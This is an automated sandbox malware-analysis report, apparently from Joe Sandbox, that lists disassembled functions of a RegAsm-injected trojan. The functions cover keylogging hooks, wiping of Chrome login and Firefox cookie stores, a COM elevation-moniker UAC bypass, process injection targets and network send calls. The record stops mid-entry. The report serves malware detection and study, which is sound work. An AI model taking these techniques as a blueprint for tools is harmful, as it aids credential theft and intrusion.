                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                              • String ID: !D@
                                                                                              • API String ID: 3520204547-604454484
                                                                                              • Opcode ID: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                                              • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                                                              • Opcode Fuzzy Hash: a471b31b0e2848d44592c209c65a27511ae0bedd1fb0e9bf63a88f6136bceacb
                                                                                              • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                                                              Function 0040BD72 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                              • API String ID: 3527384056-432212279
                                                                                              • Opcode ID: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                              • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                                                              • Opcode Fuzzy Hash: 0e02877a0a7a0854a613cb848fbdcbf87c912738fbad3b4f45ae5d99c19712fd
                                                                                              • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                                                              Function 0040F4AF Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                              • API String ID: 3756808967-1743721670
                                                                                              • Opcode ID: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                              • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                                                              • Opcode Fuzzy Hash: 1d3c19fb237022e801d10a57cb3e4ad5faa3765b37f293df49325fb65a29b400
                                                                                              • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                                                              Function 00419662 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                              • API String ID: 0-1861860590
                                                                                              • Opcode ID: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                                              • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                                                              • Opcode Fuzzy Hash: e6a777f80bf8230cc7af5635f6fa1f38021a03d05ab0836674c6e7259f08b149
                                                                                              • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                                                              Function 00407538 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0040755C
                                                                                              • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Object_wcslen
                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                              • API String ID: 240030777-3166923314
                                                                                              • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                              • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                                                              • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                                                              • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                                                              Function 0041A7D9 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                                                              • GetLastError.KERNEL32 ref: 0041A84C
                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3587775597-0
                                                                                              • Opcode ID: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                                              • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                                                              • Opcode Fuzzy Hash: 4accfa2daad176f8b5f28278118318dfa0062abe9eed3b7a7428a28b758f59c5
                                                                                              • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                                                              Function 00452690 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                              • String ID: JD$JD$JD
                                                                                              • API String ID: 745075371-3517165026
                                                                                              • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                              • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                                                              • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                                                              • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                                                              Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                              • API String ID: 1164774033-405221262
                                                                                              • Opcode ID: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                              • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                              • Opcode Fuzzy Hash: e90d06a8ec93e69e400289d3d5a4f788ee45a56a67685538a4b9ff5dd8d84a81
                                                                                              • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                              Function 0041C322 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                              • String ID:
                                                                                              • API String ID: 2341273852-0
                                                                                              • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                              • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                              • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                              • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                              Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                              • String ID: 8SG$PXG$PXG$NG$PG
                                                                                              • API String ID: 341183262-3812160132
                                                                                              • Opcode ID: decbf8f6e121a31f09a4297ff294fd137747a90a9b101ac030b240feec0812bd
                                                                                              • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                              • Opcode Fuzzy Hash: decbf8f6e121a31f09a4297ff294fd137747a90a9b101ac030b240feec0812bd
                                                                                              • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                              Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                              • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                              • GetLastError.KERNEL32 ref: 0040A328
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • GetMessageA.USER32 ref: 0040A376
                                                                                              • TranslateMessage.USER32(?), ref: 0040A385
                                                                                              • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                              Strings
                                                                                              • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                              • String ID: Keylogger initialization failure: error
                                                                                              • API String ID: 3219506041-952744263
                                                                                              • Opcode ID: fc27e46cae71e48e676fe4f224a22039b8de20a8564221e2638cded3f863b4df
                                                                                              • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                              • Opcode Fuzzy Hash: fc27e46cae71e48e676fe4f224a22039b8de20a8564221e2638cded3f863b4df
                                                                                              • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                              Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 1888522110-0
                                                                                              • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                              • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                              • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                              • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                              Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                              • API String ID: 2127411465-314212984
                                                                                              • Opcode ID: bd242308892eeed60a03188ed6a612f04b73cb25f5ca5ecf78c8c55943767dc4
                                                                                              • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                              • Opcode Fuzzy Hash: bd242308892eeed60a03188ed6a612f04b73cb25f5ca5ecf78c8c55943767dc4
                                                                                              • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                              Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00449292
                                                                                              • _free.LIBCMT ref: 004492B6
                                                                                              • _free.LIBCMT ref: 0044943D
                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                              • _free.LIBCMT ref: 00449609
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                              • String ID:
                                                                                              • API String ID: 314583886-0
                                                                                              • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                              • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                              • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                              • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                              Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                              • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                              • API String ID: 1589313981-2876530381
                                                                                              • Opcode ID: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                              • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                              • Opcode Fuzzy Hash: 4bd10a5f799b95ac4237c352870c0353e076f464d26d690b152e3588c70e8aba
                                                                                              • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                              Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                              • GetLastError.KERNEL32 ref: 0040BA93
                                                                                              Strings
                                                                                              • UserProfile, xrefs: 0040BA59
                                                                                              • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                              • API String ID: 2018770650-1062637481
                                                                                              • Opcode ID: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                              • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                              • Opcode Fuzzy Hash: 0e12c434a704d568d93f0e9ae73d02a011f2f49309dc381e150468c0f0ecafbd
                                                                                              • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                              Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                              • GetLastError.KERNEL32 ref: 004179D8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 3534403312-3733053543
                                                                                              • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                              • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                              • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                              • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                              Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00409293
                                                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                              • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                              • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                              • String ID:
                                                                                              • API String ID: 1824512719-0
                                                                                              • Opcode ID: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
